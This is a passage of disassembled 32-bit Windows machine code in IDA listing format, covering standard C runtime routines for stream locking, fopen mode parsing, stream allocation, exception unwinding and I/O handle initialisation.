loc_40870E:				; CODE XREF: sub_4086FB+Cj
		push	dword_437800
		call	sub_403B91
		pop	ecx
		retn
sub_4086FB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40871B	proc near		; CODE XREF: sub_403795+4Fp
					; sub_403A52+50p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, offset off_424950
		cmp	eax, ecx
		jb	short loc_40873F
		cmp	eax, offset dword_424BB0
		ja	short loc_40873F
		sub	eax, ecx
		sar	eax, 5
		add	eax, 10h
		push	eax
		call	sub_405FB7
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40873F:				; CODE XREF: sub_40871B+Bj
					; sub_40871B+12j
		add	eax, 20h
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection
		retn
sub_40871B	endp


; =============== S U B	R O U T	I N E =======================================



sub_40874A	proc near		; CODE XREF: sub_408A61+66p
					; sub_40923E+46p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		cmp	eax, 14h
		jge	short loc_40875E
		add	eax, 10h
		push	eax
		call	sub_405FB7
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40875E:				; CODE XREF: sub_40874A+7j
		mov	eax, [esp+arg_4]
		add	eax, 20h
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection
		retn
sub_40874A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40876D	proc near		; CODE XREF: sub_403778+3p
					; sub_4038DA+3p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, offset off_424950
		cmp	eax, ecx
		jb	short loc_408791
		cmp	eax, offset dword_424BB0
		ja	short loc_408791
		sub	eax, ecx
		sar	eax, 5
		add	eax, 10h
		push	eax
		call	sub_405EDF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_408791:				; CODE XREF: sub_40876D+Bj
					; sub_40876D+12j
		add	eax, 20h
		push	eax
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		retn
sub_40876D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40879C	proc near		; CODE XREF: sub_408A61+7Dp
					; sub_4092E0+9p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		cmp	eax, 14h
		jge	short loc_4087B0
		add	eax, 10h
		push	eax
		call	sub_405EDF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_4087B0:				; CODE XREF: sub_40879C+7j
		mov	eax, [esp+arg_4]
		add	eax, 20h
		push	eax
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		retn
sub_40879C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4087BF	proc near		; CODE XREF: sub_4036BE+9Ap

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_4287E4
		push	ebx
		xor	ebx, ebx
		push	esi
		mov	esi, [ebp+arg_4]
		mov	[ebp+var_4], eax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_8], ebx
		mov	[ebp+var_10], ebx
		jmp	short loc_4087E0
; ---------------------------------------------------------------------------

loc_4087DF:				; CODE XREF: sub_4087BF+24j
		inc	esi

loc_4087E0:				; CODE XREF: sub_4087BF+1Ej
		cmp	byte ptr [esi],	20h
		jz	short loc_4087DF
		mov	al, [esi]
		cmp	al, 61h
		jz	short loc_408824
		cmp	al, 72h
		jz	short loc_40881B
		cmp	al, 77h
		jz	short loc_408812
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		jmp	loc_408A5D
; ---------------------------------------------------------------------------

loc_408812:				; CODE XREF: sub_4087BF+32j
		mov	[ebp+arg_4], 301h
		jmp	short loc_40882B
; ---------------------------------------------------------------------------

loc_40881B:				; CODE XREF: sub_4087BF+2Ej
		or	[ebp+var_4], 1
		mov	[ebp+arg_4], ebx
		jmp	short loc_40882F
; ---------------------------------------------------------------------------

loc_408824:				; CODE XREF: sub_4087BF+2Aj
		mov	[ebp+arg_4], 109h

loc_40882B:				; CODE XREF: sub_4087BF+5Aj
		or	[ebp+var_4], 2

loc_40882F:				; CODE XREF: sub_4087BF+63j
		xor	ecx, ecx
		inc	ecx
		inc	esi
		mov	al, [esi]
		cmp	al, bl
		push	edi
		jz	loc_4089F7
		mov	edx, 80h
		mov	edi, 4000h

loc_408848:				; CODE XREF: sub_4087BF+1B6j
		cmp	ecx, ebx
		jz	loc_40897B
		movsx	eax, al
		cmp	eax, 53h
		jg	loc_4088FE
		jz	loc_4088EC
		sub	eax, 20h
		jz	loc_408970
		sub	eax, 0Bh
		jz	short loc_4088C6
		dec	eax
		jz	short loc_4088BA
		sub	eax, 18h
		jz	short loc_4088A7
		sub	eax, 0Ah
		jz	short loc_40889F
		sub	eax, 4
		jnz	loc_408A00
		cmp	[ebp+var_8], ebx
		jnz	loc_408965
		or	[ebp+arg_4], 10h
		mov	[ebp+var_8], 1
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_40889F:				; CODE XREF: sub_4087BF+BCj
		or	[ebp+arg_4], edx
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_4088A7:				; CODE XREF: sub_4087BF+B7j
		test	byte ptr [ebp+arg_4], 40h
		jnz	loc_408965
		or	[ebp+arg_4], 40h
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_4088BA:				; CODE XREF: sub_4087BF+B2j
		mov	[ebp+var_10], 1
		jmp	loc_408965
; ---------------------------------------------------------------------------

loc_4088C6:				; CODE XREF: sub_4087BF+AFj
		test	byte ptr [ebp+arg_4], 2
		jnz	loc_408965
		mov	eax, [ebp+arg_4]
		and	eax, 0FFFFFFFEh
		or	eax, 2
		mov	[ebp+arg_4], eax
		mov	eax, [ebp+var_4]
		and	eax, 0FFFFFFFCh
		or	eax, edx
		mov	[ebp+var_4], eax
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_4088EC:				; CODE XREF: sub_4087BF+9Dj
		cmp	[ebp+var_8], ebx
		jnz	short loc_408965
		or	[ebp+arg_4], 20h
		mov	[ebp+var_8], 1
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_4088FE:				; CODE XREF: sub_4087BF+97j
		sub	eax, 54h
		jz	short loc_40895D
		sub	eax, 0Eh
		jz	short loc_40894C
		dec	eax
		jz	short loc_40893B
		sub	eax, 0Bh
		jz	short loc_408926
		sub	eax, 6
		jnz	loc_408A00
		test	word ptr [ebp+arg_4], 0C000h
		jnz	short loc_408965
		or	[ebp+arg_4], edi
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_408926:				; CODE XREF: sub_4087BF+14Fj
		cmp	[ebp+var_C], ebx
		jnz	short loc_408965
		and	[ebp+var_4], 0FFFFBFFFh
		mov	[ebp+var_C], 1
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_40893B:				; CODE XREF: sub_4087BF+14Aj
		cmp	[ebp+var_C], ebx
		jnz	short loc_408965
		or	[ebp+var_4], edi
		mov	[ebp+var_C], 1
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_40894C:				; CODE XREF: sub_4087BF+147j
		test	word ptr [ebp+arg_4], 0C000h
		jnz	short loc_408965
		or	[ebp+arg_4], 8000h
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_40895D:				; CODE XREF: sub_4087BF+142j
		test	word ptr [ebp+arg_4], 1000h
		jz	short loc_408969

loc_408965:				; CODE XREF: sub_4087BF+CAj
					; sub_4087BF+ECj ...
		xor	ecx, ecx
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_408969:				; CODE XREF: sub_4087BF+1A4j
		or	[ebp+arg_4], 1000h

loc_408970:				; CODE XREF: sub_4087BF+A6j
					; sub_4087BF+DBj ...
		inc	esi
		mov	al, [esi]
		cmp	al, bl
		jnz	loc_408848

loc_40897B:				; CODE XREF: sub_4087BF+8Bj
		cmp	[ebp+var_10], ebx
		jz	short loc_4089F7
		jmp	short loc_408983
; ---------------------------------------------------------------------------

loc_408982:				; CODE XREF: sub_4087BF+1C7j
		inc	esi

loc_408983:				; CODE XREF: sub_4087BF+1C1j
		cmp	byte ptr [esi],	20h
		jz	short loc_408982
		push	4
		push	esi
		push	offset aCcs	; "ccs="
		call	sub_40F0F0
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_408A00
		add	esi, 4
		push	offset aUtf8	; "UTF-8"
		push	esi
		call	sub_40EF74
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4089BC
		add	esi, 5
		or	[ebp+arg_4], 40000h
		jmp	short loc_4089F7
; ---------------------------------------------------------------------------

loc_4089BC:				; CODE XREF: sub_4087BF+1EFj
		push	offset aUtf16le	; "UTF-16LE"
		push	esi
		call	sub_40EF74
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4089D9
		add	esi, 8
		or	[ebp+arg_4], 20000h
		jmp	short loc_4089F7
; ---------------------------------------------------------------------------

loc_4089D9:				; CODE XREF: sub_4087BF+20Cj
		push	offset aUnicode	; "UNICODE"
		push	esi
		call	sub_40EF74
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_408A00
		add	esi, 7
		or	[ebp+arg_4], 10000h
		jmp	short loc_4089F7
; ---------------------------------------------------------------------------

loc_4089F6:				; CODE XREF: sub_4087BF+23Bj
		inc	esi

loc_4089F7:				; CODE XREF: sub_4087BF+79j
					; sub_4087BF+1BFj ...
		cmp	byte ptr [esi],	20h
		jz	short loc_4089F6
		cmp	[esi], bl
		jz	short loc_408A1A

loc_408A00:				; CODE XREF: sub_4087BF+C1j
					; sub_4087BF+154j ...
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_408A38
; ---------------------------------------------------------------------------

loc_408A1A:				; CODE XREF: sub_4087BF+23Fj
		push	180h
		push	[ebp+arg_8]
		lea	eax, [ebp+var_10]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	eax
		call	sub_40ED3C
		add	esp, 14h
		test	eax, eax
		jz	short loc_408A3C

loc_408A38:				; CODE XREF: sub_4087BF+259j
		xor	eax, eax
		jmp	short loc_408A5C
; ---------------------------------------------------------------------------

loc_408A3C:				; CODE XREF: sub_4087BF+277j
		mov	eax, [ebp+arg_C]
		inc	dword_428328
		mov	ecx, [ebp+var_4]
		mov	[eax+0Ch], ecx
		mov	ecx, [ebp+var_10]
		mov	[eax+4], ebx
		mov	[eax], ebx
		mov	[eax+8], ebx
		mov	[eax+1Ch], ebx
		mov	[eax+10h], ecx

loc_408A5C:				; CODE XREF: sub_4087BF+27Bj
		pop	edi

loc_408A5D:				; CODE XREF: sub_4087BF+4Ej
		pop	esi
		pop	ebx
		leave
		retn
sub_4087BF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408A61	proc near		; CODE XREF: sub_4036BE+54p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	10h
		push	offset dword_422AA8
		call	__SEH_prolog4
		xor	ebx, ebx
		xor	edi, edi
		mov	[ebp+var_1C], edi
		push	1
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		xor	esi, esi

loc_408A81:				; CODE XREF: sub_408A61+85j
		mov	[ebp+var_20], esi
		cmp	esi, dword_438820
		jge	loc_408B51
		mov	eax, dword_437800
		lea	eax, [eax+esi*4]
		cmp	[eax], ebx
		jz	short loc_408AEC
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jnz	short loc_408AE5
		lea	eax, [esi-3]
		cmp	eax, 10h
		ja	short loc_408ABE
		lea	eax, [esi+10h]
		push	eax
		call	sub_405EF4
		pop	ecx
		test	eax, eax
		jz	loc_408B51

loc_408ABE:				; CODE XREF: sub_408A61+49j
		mov	eax, dword_437800
		push	dword ptr [eax+esi*4]
		push	esi
		call	sub_40874A
		pop	ecx
		pop	ecx
		mov	eax, dword_437800
		mov	eax, [eax+esi*4]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_408AE8
		push	eax
		push	esi
		call	sub_40879C
		pop	ecx
		pop	ecx

loc_408AE5:				; CODE XREF: sub_408A61+41j
		inc	esi
		jmp	short loc_408A81
; ---------------------------------------------------------------------------

loc_408AE8:				; CODE XREF: sub_408A61+79j
		mov	edi, eax
		jmp	short loc_408B4E
; ---------------------------------------------------------------------------

loc_408AEC:				; CODE XREF: sub_408A61+39j
		shl	esi, 2
		push	38h
		call	sub_407CFA
		pop	ecx
		mov	ecx, dword_437800
		mov	[esi+ecx], eax
		mov	eax, dword_437800
		add	eax, esi
		cmp	[eax], ebx
		jz	short loc_408B51
		push	0FA0h
		mov	eax, [eax]
		add	eax, 20h
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		mov	eax, dword_437800
		jnz	short loc_408B39
		push	dword ptr [esi+eax]
		call	sub_403B91
		pop	ecx
		mov	eax, dword_437800
		mov	[esi+eax], ebx
		jmp	short loc_408B51
; ---------------------------------------------------------------------------

loc_408B39:				; CODE XREF: sub_408A61+C3j
		mov	eax, [esi+eax]
		add	eax, 20h
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection
		mov	eax, dword_437800
		mov	edi, [esi+eax]

loc_408B4E:				; CODE XREF: sub_408A61+89j
		mov	[ebp+var_1C], edi

loc_408B51:				; CODE XREF: sub_408A61+29j
					; sub_408A61+57j ...
		cmp	edi, ebx
		jz	short loc_408B67
		mov	[edi+4], ebx
		mov	[edi+0Ch], ebx
		mov	[edi+8], ebx
		mov	[edi], ebx
		mov	[edi+1Ch], ebx
		or	dword ptr [edi+10h], 0FFFFFFFFh

loc_408B67:				; CODE XREF: sub_408A61+F2j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_408B7E
		mov	eax, edi
		call	__SEH_epilog4
		retn
sub_408A61	endp


; =============== S U B	R O U T	I N E =======================================



sub_408B7B	proc near		; DATA XREF: jlrllt49:00422AC0o
		mov	edi, [ebp-1Ch]
sub_408B7B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_408B7E	proc near		; CODE XREF: sub_408A61+10Dp
		push	1
		call	sub_405EDF
		pop	ecx
		retn
sub_408B7E	endp

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_408B88	proc near		; CODE XREF: sub_4036BE+8Ap
					; sub_408B88+BDp ...

var_20		= dword	ptr -20h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	ebx
		push	esi
		push	edi
		mov	edx, [esp+0Ch+arg_0]
		mov	eax, [esp+0Ch+arg_4]
		mov	ecx, [esp+0Ch+arg_8]
		push	ebp
		push	edx
		push	eax
		push	ecx
		push	ecx
		push	offset loc_408C18
		push	large dword ptr	fs:0
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+28h+var_20], eax
		mov	large fs:0, esp

loc_408BBA:				; CODE XREF: sub_408B88+64j
					; sub_408B88+80j
		mov	eax, [esp+28h+arg_4]
		mov	ebx, [eax+8]
		mov	ecx, [esp+28h+arg_0]
		xor	ebx, [ecx]
		mov	esi, [eax+0Ch]
		cmp	esi, 0FFFFFFFEh
		jz	short loc_408C0A
		mov	edx, [esp+28h+arg_8]
		cmp	edx, 0FFFFFFFEh
		jz	short loc_408BDC
		cmp	esi, edx
		jbe	short loc_408C0A

loc_408BDC:				; CODE XREF: sub_408B88+4Ej
		lea	esi, [esi+esi*2]
		lea	ebx, [ebx+esi*4+10h]
		mov	ecx, [ebx]
		mov	[eax+0Ch], ecx
		cmp	dword ptr [ebx+4], 0
		jnz	short loc_408BBA
		push	101h
		mov	eax, [ebx+8]
		call	sub_40F21D
		mov	ecx, 1
		mov	eax, [ebx+8]
		call	sub_40F23C
		jmp	short loc_408BBA
; ---------------------------------------------------------------------------

loc_408C0A:				; CODE XREF: sub_408B88+45j
					; sub_408B88+52j
		pop	large dword ptr	fs:0
		add	esp, 18h
		pop	edi
		pop	esi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_408C18:				; DATA XREF: sub_408B88+14o
		mov	ecx, [esp+arg_0]
		test	dword ptr [ecx+4], 6
		mov	eax, 1
		jz	short locret_408C5D
		mov	eax, [esp+arg_4]
		mov	ecx, [eax+8]
		xor	ecx, eax
		call	sub_402C9E
		push	ebp
		mov	ebp, [eax+18h]
		push	dword ptr [eax+0Ch]
		push	dword ptr [eax+10h]
		push	dword ptr [eax+14h]
		call	sub_408B88
		add	esp, 0Ch
		pop	ebp
		mov	eax, [esp+arg_4]
		mov	edx, [esp+arg_C]
		mov	[edx], eax
		mov	eax, 3

locret_408C5D:				; CODE XREF: sub_408B88+A0j
		retn
sub_408B88	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ecx, [esp+8]
		mov	ebp, [ecx]
		push	dword ptr [ecx+1Ch]
		push	dword ptr [ecx+18h]
		push	dword ptr [ecx+28h]
		call	sub_408B88
		add	esp, 0Ch
		pop	ebp
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_408C7A	proc near		; CODE XREF: sub_406C00+89p
		push	ebp
		push	esi
		push	edi
		push	ebx
		mov	ebp, edx
		xor	eax, eax
		xor	ebx, ebx
		xor	edx, edx
		xor	esi, esi
		xor	edi, edi
		call	ecx
		pop	ebx
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_408C7A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_406C00

loc_408C91:				; CODE XREF: sub_406C00+170j
		mov	ebp, edx
		mov	esi, ecx
		mov	eax, ecx
		push	1
		call	sub_40F21D
		xor	eax, eax
		xor	ebx, ebx
		xor	ecx, ecx
		xor	edx, edx
		xor	edi, edi
		jmp	esi
; END OF FUNCTION CHUNK	FOR sub_406C00

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408CAA	proc near		; CODE XREF: sub_406C00+11Fp
		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		push	0
		push	0
		push	offset loc_408CBF
		push	ecx
		call	sub_413F36

loc_408CBF:				; DATA XREF: sub_408CAA+Ao
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_408CAA	endp


; =============== S U B	R O U T	I N E =======================================



sub_408CC4	proc near		; CODE XREF: sub_406C00+137p
					; sub_406C00+18Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebp
		mov	ebp, [esp+4+arg_0]
		push	edx
		push	ecx
		push	[esp+0Ch+arg_4]
		call	sub_408B88
		add	esp, 0Ch
		pop	ebp
		retn	8
sub_408CC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_408CDB	proc near		; CODE XREF: sub_403795+10Ep

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	esi
		call	sub_408FE0
		push	eax
		call	sub_40DB00
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_408D6D
		call	sub_408644
		add	eax, 20h
		cmp	esi, eax
		jnz	short loc_408D02
		xor	eax, eax
		jmp	short loc_408D11
; ---------------------------------------------------------------------------

loc_408D02:				; CODE XREF: sub_408CDB+21j
		call	sub_408644
		add	eax, 40h
		cmp	esi, eax
		jnz	short loc_408D6D
		xor	eax, eax
		inc	eax

loc_408D11:				; CODE XREF: sub_408CDB+25j
		inc	dword_428328
		test	word ptr [esi+0Ch], 10Ch
		jnz	short loc_408D6D
		push	ebx
		push	edi
		lea	edi, ds:42832Ch[eax*4]
		cmp	dword ptr [edi], 0
		mov	ebx, 1000h
		jnz	short loc_408D52
		push	ebx
		call	sub_407CFA
		test	eax, eax
		pop	ecx
		mov	[edi], eax
		jnz	short loc_408D52
		lea	eax, [esi+14h]
		push	2
		mov	[esi+8], eax
		mov	[esi], eax
		pop	eax
		mov	[esi+18h], eax
		mov	[esi+4], eax
		jmp	short loc_408D5F
; ---------------------------------------------------------------------------

loc_408D52:				; CODE XREF: sub_408CDB+55j
					; sub_408CDB+62j
		mov	edi, [edi]
		mov	[esi+8], edi
		mov	[esi], edi
		mov	[esi+18h], ebx
		mov	[esi+4], ebx

loc_408D5F:				; CODE XREF: sub_408CDB+75j
		or	dword ptr [esi+0Ch], 1102h
		pop	edi
		xor	eax, eax
		pop	ebx
		inc	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_408D6D:				; CODE XREF: sub_408CDB+15j
					; sub_408CDB+31j ...
		xor	eax, eax
		pop	esi
		retn
sub_408CDB	endp


; =============== S U B	R O U T	I N E =======================================



sub_408D71	proc near		; CODE XREF: sub_403795+128p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 0
		jz	short locret_408D9F
		push	esi
		mov	esi, [esp+4+arg_4]
		test	word ptr [esi+0Ch], 1000h
		jz	short loc_408D9E
		push	esi
		call	sub_40919A
		and	dword ptr [esi+0Ch], 0FFFFEEFFh
		and	dword ptr [esi+18h], 0
		and	dword ptr [esi], 0
		and	dword ptr [esi+8], 0
		pop	ecx

loc_408D9E:				; CODE XREF: sub_408D71+12j
		pop	esi

locret_408D9F:				; CODE XREF: sub_408D71+5j
		retn
sub_408D71	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408DA0	proc near		; CODE XREF: .text:004045FEp

var_64		= byte ptr -64h
var_32		= word ptr -32h
var_30		= dword	ptr -30h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	54h
		push	offset dword_422AC8
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+ms_exc.disabled], edi
		lea	eax, [ebp+var_64]
		push	eax
		call	ds:off_41E1A8
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		push	28h
		push	20h
		pop	esi
		push	esi
		call	sub_407D3A
		pop	ecx
		pop	ecx
		cmp	eax, edi
		jz	loc_408FD7
		mov	dword_437700, eax
		mov	dword_4376E4, esi
		lea	ecx, [eax+500h]
		jmp	short loc_408E13
; ---------------------------------------------------------------------------

loc_408DEA:				; CODE XREF: sub_408DA0+75j
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		mov	[eax+8], edi
		mov	byte ptr [eax+24h], 0
		mov	byte ptr [eax+25h], 0Ah
		mov	byte ptr [eax+26h], 0Ah
		add	eax, 28h
		mov	ecx, dword_437700
		add	ecx, 500h

loc_408E13:				; CODE XREF: sub_408DA0+48j
		cmp	eax, ecx
		jb	short loc_408DEA
		cmp	[ebp+var_32], di
		jz	loc_408F1E
		mov	eax, [ebp+var_30]
		cmp	eax, edi
		jz	loc_408F1E
		mov	edi, [eax]
		lea	ebx, [eax+4]
		lea	eax, [ebx+edi]
		mov	[ebp+var_1C], eax
		mov	eax, 800h
		cmp	edi, eax
		jl	short loc_408E42
		mov	edi, eax

loc_408E42:				; CODE XREF: sub_408DA0+9Ej
		xor	esi, esi
		inc	esi
		jmp	short loc_408E99
; ---------------------------------------------------------------------------

loc_408E47:				; CODE XREF: sub_408DA0+FFj
		push	28h
		push	20h
		call	sub_407D3A
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_408EA3
		lea	ecx, ds:437700h[esi*4]
		mov	[ecx], eax
		add	dword_4376E4, 20h
		lea	edx, [eax+500h]
		jmp	short loc_408E94
; ---------------------------------------------------------------------------

loc_408E6E:				; CODE XREF: sub_408DA0+F6j
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		and	dword ptr [eax+8], 0
		and	byte ptr [eax+24h], 80h
		mov	byte ptr [eax+25h], 0Ah
		mov	byte ptr [eax+26h], 0Ah
		add	eax, 28h
		mov	edx, [ecx]
		add	edx, 500h

loc_408E94:				; CODE XREF: sub_408DA0+CCj
		cmp	eax, edx
		jb	short loc_408E6E
		inc	esi

loc_408E99:				; CODE XREF: sub_408DA0+A5j
		cmp	dword_4376E4, edi
		jl	short loc_408E47
		jmp	short loc_408EA9
; ---------------------------------------------------------------------------

loc_408EA3:				; CODE XREF: sub_408DA0+B4j
		mov	edi, dword_4376E4

loc_408EA9:				; CODE XREF: sub_408DA0+101j
		and	[ebp+var_20], 0
		test	edi, edi
		jle	short loc_408F1E

loc_408EB1:				; CODE XREF: sub_408DA0+17Cj
		mov	eax, [ebp+var_1C]
		mov	ecx, [eax]
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_408F11
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_408F11
		mov	al, [ebx]
		test	al, 1
		jz	short loc_408F11
		test	al, 8
		jnz	short loc_408ED5
		push	ecx
		call	ds:dword_41E144	; GetFileType
		test	eax, eax
		jz	short loc_408F11

loc_408ED5:				; CODE XREF: sub_408DA0+128j
		mov	esi, [ebp+var_20]
		mov	eax, esi
		sar	eax, 5
		and	esi, 1Fh
		imul	esi, 28h
		add	esi, dword_437700[eax*4]
		mov	eax, [ebp+var_1C]
		mov	eax, [eax]
		mov	[esi], eax
		mov	al, [ebx]
		mov	[esi+4], al
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_408FD7
		inc	dword ptr [esi+8]

loc_408F11:				; CODE XREF: sub_408DA0+119j
					; sub_408DA0+11Ej ...
		inc	[ebp+var_20]
		inc	ebx
		add	[ebp+var_1C], 4
		cmp	[ebp+var_20], edi
		jl	short loc_408EB1

loc_408F1E:				; CODE XREF: sub_408DA0+7Bj
					; sub_408DA0+86j ...
		xor	ebx, ebx

loc_408F20:				; CODE XREF: sub_408DA0+213j
		mov	esi, ebx
		imul	esi, 28h
		add	esi, dword_437700
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_408F3D
		cmp	eax, 0FFFFFFFEh
		jz	short loc_408F3D
		or	byte ptr [esi+4], 80h
		jmp	short loc_408FAF
; ---------------------------------------------------------------------------

loc_408F3D:				; CODE XREF: sub_408DA0+190j
					; sub_408DA0+195j
		mov	byte ptr [esi+4], 81h
		test	ebx, ebx
		jnz	short loc_408F4A
		push	0FFFFFFF6h
		pop	eax
		jmp	short loc_408F54
; ---------------------------------------------------------------------------

loc_408F4A:				; CODE XREF: sub_408DA0+1A3j
		mov	eax, ebx
		dec	eax
		neg	eax
		sbb	eax, eax
		add	eax, 0FFFFFFF5h

loc_408F54:				; CODE XREF: sub_408DA0+1A8j
		push	eax
		call	ds:dword_41E148	; GetStdHandle
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jz	short loc_408FA5
		test	edi, edi
		jz	short loc_408FA5
		push	edi
		call	ds:dword_41E144	; GetFileType
		test	eax, eax
		jz	short loc_408FA5
		mov	[esi], edi
		and	eax, 0FFh
		cmp	eax, 2
		jnz	short loc_408F83
		or	byte ptr [esi+4], 40h
		jmp	short loc_408F8C
; ---------------------------------------------------------------------------

loc_408F83:				; CODE XREF: sub_408DA0+1DBj
		cmp	eax, 3
		jnz	short loc_408F8C
		or	byte ptr [esi+4], 8

loc_408F8C:				; CODE XREF: sub_408DA0+1E1j
					; sub_408DA0+1E6j
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_408FD7
		inc	dword ptr [esi+8]
		jmp	short loc_408FAF
; ---------------------------------------------------------------------------

loc_408FA5:				; CODE XREF: sub_408DA0+1C0j
					; sub_408DA0+1C4j ...
		or	byte ptr [esi+4], 40h
		mov	dword ptr [esi], 0FFFFFFFEh

loc_408FAF:				; CODE XREF: sub_408DA0+19Bj
					; sub_408DA0+203j
		inc	ebx
		cmp	ebx, 3
		jl	loc_408F20
		push	dword_4376E4
		call	ds:dword_41E14C	; LockResource
		xor	eax, eax
		jmp	short loc_408FDA
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_408FD7:				; CODE XREF: sub_408DA0+31j
					; sub_408DA0+168j ...
		or	eax, 0FFFFFFFFh

loc_408FDA:				; CODE XREF: sub_408DA0+227j
		call	__SEH_epilog4
		retn
sub_408DA0	endp


; =============== S U B	R O U T	I N E =======================================



sub_408FE0	proc near		; CODE XREF: sub_403795+63p
					; sub_403795+6Fp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_409008
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_409008:				; CODE XREF: sub_408FE0+9j
		mov	eax, [eax+10h]
		pop	esi
		retn
sub_408FE0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40900D	proc near		; CODE XREF: sub_4090A1+94p
					; sub_40E632+340p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		push	esi
		call	sub_40F33D
